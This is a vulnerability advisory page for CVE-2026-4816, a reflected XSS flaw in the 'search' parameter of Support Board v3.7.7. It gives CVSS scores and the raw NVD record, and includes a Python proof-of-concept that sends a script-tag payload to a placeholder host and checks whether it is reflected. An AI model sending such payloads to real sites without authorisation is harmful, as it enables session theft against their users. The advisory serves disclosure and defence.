CVE-2026-4816

Description

A Reflected Cross Site Scripting (XSS) vulnerability has been found in Support Board v3.7.7. This vulnerability allows an attacker to execute JavaScript code in the victim's browser by sending the victim a malicious URL using the 'search' parameter in '/supportboard/include/articles.php'. This vulnerability can be exploited to steal sensitive user data, such as session cookies, or to perform actions on behalf of the user.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:schiocco:support_board:*:*:*:*:*:wordpress:*:* - VULNERABLE

Support Board v3.7.7

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# Proof of Concept for CVE-2026-4816
# Target: Support Board v3.7.7
# Vulnerable Endpoint: /supportboard/include/articles.php
# Vulnerable Parameter: search

import requests

target_url = "http://target.com/supportboard/include/articles.php"

# Malicious payload to demonstrate XSS execution
# Using a simple script tag to test reflection
xss_payload = "<script>alert('CVE-2026-4816_XSS');</script>"

parameters = {
    "search": xss_payload
}

try:
    response = requests.get(target_url, params=parameters, timeout=5)
    
    # Check if the payload is reflected in the response without encoding
    if xss_payload in response.text:
        print("[+] Vulnerability Confirmed: The payload was reflected unfiltered.")
        print("[+] Target URL: " + response.url)
    else:
        print("[-] Vulnerability not detected or payload was encoded.")
        
except Exception as e:
    print(f"Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-4816
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-4816
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-4816/
[4] VulDB https://vuldb.com/cve/CVE-2026-4816
[5] https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-support-board-schiocco

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-4816", "sourceIdentifier": "[email protected]", "published": "2026-03-25T14:16:40.300", "lastModified": "2026-03-26T14:53:28.623", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Reflected Cross Site Scripting (XSS) vulnerability has been found in Support Board v3.7.7. This vulnerability allows an attacker to execute JavaScript code in the victim's browser by sending the victim a malicious URL using the 'search' parameter in '/supportboard/include/articles.php'. This vulnerability can be exploited to steal sensitive user data, such as session cookies, or to perform actions on behalf of the user."}, {"lang": "es", "value": "Una vulnerabilidad de Cross Site Scripting Reflejado (XSS) ha sido encontrada en Support Board v3.7.7. Esta vulnerabilidad permite a un atacante ejecutar código JavaScript en el navegador de la víctima enviándole una URL maliciosa utilizando el parámetro 'search' en '/supportboard/include/articles.php'. Esta vulnerabilidad puede ser explotada para robar datos sensibles del usuario, como cookies de sesión, o para realizar acciones en nombre del usuario."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:schiocco:support_board:*:*:*:*:*:wordpress:*:*", "versionEndExcluding": "3.7.8", "matchCriteriaId": "47462996-66AF-40DF-ABE4-A0150B509FEB"}]}]}], "references": [{"url": "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-support-board-schiocco", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}